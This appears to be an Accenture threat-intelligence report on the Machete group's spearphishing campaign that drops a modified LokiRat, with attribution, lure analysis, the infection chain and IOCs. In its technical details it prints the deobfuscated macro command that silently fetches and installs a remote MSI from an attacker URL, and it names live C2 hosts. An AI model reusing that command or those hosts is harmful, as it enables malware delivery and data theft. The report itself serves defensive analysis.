Machete adopts LokiRat as part of their toolset

Machete, a Spanish-speaking cyber espionage threat group associated with the Machete malware family, used military-themed lures to drop LokiRat, based on ACTI analysis of samples identified on an open-source malware repository in October 2020.  ACTI has observed this remote administration tool freely available on Brazilian dark web forums as well as online code repositories; however, this is the first time ACTI has observed the Machete group integrate LokiRat code into their toolset.

Background

Machete (referred to as BULLSHARK by Accenture Cyber Threat Intelligence) has likely been active since 2010. This threat group has primarily focused its computer network intrusion operations against military and government organizations in Latin America, in particular Venezuela, Ecuador, & Colombia.

Attribution

ACTI attributes the LokiRat campaign to the Machete threat group based on the document lures, document metadata showing documents were drafted in Spanish, keylogger code targeting systems set in Spanish, and Python code overlap used in past ACTI analyzed Machete campaigns.

This recent campaign is within the group’s typical target set and appears to be targeting the Venezuelan military, judging from the spearphishing lure used. Based on the assessed targeted military organization and the observed tactics, techniques and procedures (TTPs), Accenture CTI assesses that Machete is likely associated with an unknown government based in or near Latin America.

The code and infrastructure also contain Russian-language strings, although these strings are seemingly arbitrary and not suggestive of Russian origin. For example in the code snippets shown below, the code authors changed one of the HTTP request fields from ‘Black_Lightning’ to ‘Utopiya_Nyusha_Maksim` suggesting this is a change that happened after the code was already developed and not an artifact from the developers.  ACTI assesses that the Russian-language artifacts are likely the threat actor’s attempt to introduce misattribution.

<<< Start >>>

Machete code from 2019

<<< End >>>

<<< Start >>>

Machete code from 2020

<<< End >>>

Spearphishing lures imitate military documents

The Machete threat group is known to use real military documents as decoy files  in their phishing campaigns as documented by ESET in 2019, and the lure in this campaign follows this trend, with a likely stolen Venezuelan military document used as the lure.  The threat actors have recently included the lure inside a weaponized file.  Although the lure had a .doc extension, it was an ActiveMime web page archive with malicious macros.

<<< Start >>>

Example of one of the lures

<<< End >>>

The threat actors used ActiveMime archives to increase the obfuscation of their lures.  This format is used to encode and compress the malicious macro which can help the macro evade anti-virus products and other defenses aimed at identifying malicious code strings. Because the lure is disguised with a .doc extension, the victim user often does not realize it is not a typical Word document when they receive it.

Adding LokiRat to their toolset

In this latest campaign Machete integrated python code from LokiRat into its custom Machete code, a first for the group. The similarities in the code between previous campaigns and this recent campaign bolsters our assessment that LokiRat was integrated into the group’s bespoke malware and that the Machete nation-state group carried out this campaign.

Most of the core functionality that LokiRat provides has been in the Machete framework for many years, but the LokiRat code gives the threat actors a couple of new benefits.  First, it expands on Machete’s capabilities available to the operators by including functions to:

• Extract browser passwords from Chrome and FireFox
• Capture keystrokes
• Take screenshots
• Employ self-cleanup by deleting LokitRat and auxiliary python files
• Create, modify, and delete files

The below screen capture shows Machete keylogging functionality code from the 2019 Machete campaigns.

<<< Start >>>

Keylogging functionality code from 2019

<<< End >>>

The below screenshot captures similar code used in this campaign.

<<< Start >>>

Keylogging functionality code from 2020

<<< End >>>

Second, it allows Machete operators to utilize the HTTP protocol for communications instead of FTP, the latter of which exposes usernames and passwords used to login to the operator’s command-and-control (C2) server.  The LokiRat code also helps facilitate interaction between the compromised host and the C2 server by executing the following commands:

• Uploading / downloading files
• Running native shell commands
• Compressing archives

Conclusion

Machete has a long history of cyber espionage, the group is known for targeting Latin American entities, an area that is underreported by security vendors. Machete’s main toolset, Machete, has been thoroughly analyzed by researchers, thus increasing the detection rates by anti-malware solutions. Evolving tactics and utilizing open-source code enables, at least for a short time, the ability for the malware to stay under the radar.

The Accenture Cyber Threat Intelligence (ACTI) team provides actionable and relevant threat intelligence to support decision makers. The intelligence analysis and assessments in this report are grounded in verified facts; more information on this activity is available to subscription customers on ACTI IntelGraph. IntelGraph is a proprietary next generation security intelligence platform that allows users to search, visualize, and contextualize the relationships between malicious actors, their tools and the vulnerabilities they exploit.

MITRE ATT&CK® Techniques

Accenture Security

Accenture Security is a leading provider of end-to-end cybersecurity services, including advanced cyber defense, applied cybersecurity solutions and managed security operations. We bring security innovation, coupled with global scale and a worldwide delivery capability through our network of Advanced Technology and Intelligent Operations centers. Helped by our team of highly skilled professionals, we enable clients to innovate safely, build cyber resilience and grow with confidence.  Follow us @AccentureSecure on Twitter or visit us at www.accenture.com/security.

Accenture, the Accenture logo, and other trademarks, service marks, and designs are registered or unregistered trademarks of Accenture and its subsidiaries in the United States and in foreign countries. All trademarks are properties of their respective owners. All materials are intended for the original recipient only. The reproduction and distribution of this material is forbidden without express written permission from Accenture. The opinions, statements, and assessments in this report are solely those of the individual author(s) and do not constitute legal advice, nor do they necessarily reflect the views of Accenture, its subsidiaries, or affiliates. Given the inherent nature of threat intelligence, the content contained in this report is based on information gathered and understood at the time of its creation. It is subject to change. Accenture provides the information on an “as-is” basis without representation or warranty and accepts no liability for any action or failure to act taken in response to the information contained or referenced in this report.

Copyright © 2020 Accenture. All rights reserved.

Technical details

 Initial access

The spear phishing lures in this campaign, which were uploaded to VirusTotal, utilized images from internal Venezuelan military memos, similar to what has been previously reported. These images were likely stolen from the Venezuelan military during previous operations. Exhibits #1 and #2 show examples of the images used in this campaign.

<<< Start >>>

Exhibit 1: Image used in spearphishing lure #1

<<< End >>>

<<< Start >>>

Exhibit 2: Image used in spearphishing lure #2

<<< End >>>

Machete actors designed ActiveMime web page archives with malicious macros that they saved as “.doc” files.

Lure document execution

These documents contained malicious VBA macros. The macro contents are password protected to deter users from reading the contents of the code with Word, however the code is readable using the OleVBA tool shown in Exhibit 3:

<<< Start >>>

Exhibit 3: Contents of malicious macros

<<< End >>>

To ensure the malicious macros execute when the user opens the document and enables macros, the VBA code contains two auto-start methods: `Sub AutoOpen()` and `Sub Auto_Open()`. Both methods point to the same function.

The VBA macro concatenates single-byte characters and creates the string `C:\ProgramData\00011g.vbe` representing the filename that will hold the results of VBScript code that is written in the lure document and executed in the next step.

To hide the malicious VBScript contents within the Word document, the malware authors write the strings to the footer of the document using a font size of 1, which makes the strings  invisible to the human eye. The VBA macro extracts the strings using the following code:

`With ActiveDocument.Sections(1)
Dim Wrd As String
Wrd = .Footers(wdHeaderFooterPrimary).Range.Text`

The strings are then written to the file created earlier: 
`C:\ProgramData\00011g.vbe`

The raw contents of the VBScript are:

<<< Start >>>

Exhibit 4: Contents of malicious VBScript

<<< End >>>

The deobfuscated VBScript contents are:

`C:\Windows\System32\cmd.exe" /NOCONSOLE /c msiexec /q /i https://cutt.ly/LgliNoc`

The VBScript executes msiexec to fetch an MSI file using a shortened URL  `https://cut[.]ly/LgliNoc `. (The original URL is `https://surgutneftegazappstore[.]com/poiuytrewq/mplayer.msi`.) The contents of the MSI file are shown in Exhibit 5:

<<< Start >>>

Exhibit 5: MSI contents

<<< End >>>

LokiRat installation phase

The MSI file contains two files: a benign DLL file and a file named `bz.WrappedSetupProgram`.

The malicious contents exist within `bz.WrappedSetupProgram`, a compressed archive. This CAB archive contains 141 directories and 1,278 files. The contents of this archive are saved into the `%appdata%\ ` directory.

Upon execution, the archive launches a portable executable file named `Projec.exe`.

As shown in Exhibit 6, the executable hides the current window, sleeps for 60 seconds, and uses `WinExec` to run the command:

`cmd /NOCONSOLE /c mplayer\Updatewmplayer.exe mplayer\Presk`

<<< Start >>>

Exhibit 6: Projec's main function

<<< End >>>

The developers renamed the legitimate Python2.7 `pythonw.exe` interpreter file to `Updatewmplayer.exe`. The file launches the Python code stored in `mplayer\Presk`.

The Python script `Presk` sets up LokiRat and performs the following actions:

• Changes the directory attributes of `\KMPlayer` to HIDDEN.
• Removes the file `Projec.exe`, which is no longer needed for execution.
• Creates a persistent scheduled task that executes the legitimate, renamed Python interpreter `Updatewmplayer.exe` with the following argument: `\\KMPlayer\\mplayer\\Lib\\site-packages\\Player\\Datawmplayer`

The file `Datawmplayer` is a modified version of LokiRat. Upon execution, the RAT reads a text file from:

 `\\KMPlayer\\mplayer\\Lib\\site-packages\\Player\\license.dll`  (Note the bogus .dll extension.)

LokiRat command and control

Initially, the `license.dll` file contains the URL https://ultracifrado.blogspot[.]com/ as a Base64-encoded string. The domain is shown in Exhibit 7.

<<< Start >>>

Exhibit 7: Contents of malicious domain

<<< End >>>

The RAT communicates with the above domain and performs the following command-and-control (C2) operations:

• Makes a request to the https://ultracifrado.blogspot[.]com domain and parses the contents of the response.
• Searches for the string delimiter `amar` and Base64 decodes the contents.
• Uses the decoded string for the backdoor implant's C2 communications.

ACTI analysts captured the C2 domain used in this campaign as http://31.207.45[.]243:8080.

As of the time of this writing, the domain `https://ultracifrado.blogspot.com/` contains code that indicates these two domains are also used in other Machete campaigns:

  - http://185.70.187[.]110/Rumpwltop.php
  - https://surgutneftegazappstore[.]com/KK2/katiusk.php

LokiRat capabilities

The modified version of LokiRat is self-documented; Exhibit 8, below, shows its main features:

<<< Start >>>

Exhibit 8: LokiRat's functionalities

<<< End >>>

Auxiliary Python files

The below python files are used to complement LokiRat’s functionality. Most of the code is re-used from previous Machete campaigns.

• Presk creates the persistence mechanism. The code creates a scheduled task to run every 5 minutes named Datawmplayer that executes the main LokiRat payload stored at `\\KMPlayer\\mplayer\\Lib\\site-packages\\Player\\Datawmplayer`
• Dropmplayer creates a directory under %appdata%\\Microsoft\\WindowsCenter\\dream to store profile data extracted and .zip compressed from Chrome, Safari, Opera, and FireFox.
• wmUpdate contains keylogging code functionality targeting systems using Spanish as the language. Keystrokes are logged in `\\KMPlayer\\mplayer\\Lib\\site-packages\\Player\\-vpr.html`

IOCs

To mitigate against this campaign, ACTI suggests checking network logs for indicators related to these backdoors including the following IOCs:

C&C URLs

http://185.70.187[.]110/Rumpwltop.php
https://surgutneftegazappstore[.]com/KK2/katiusk.php
https://cutt[.]ly/LgliNoc
https://surgutneftegazappstore[.]com/poiuytrewq/mplayer.msi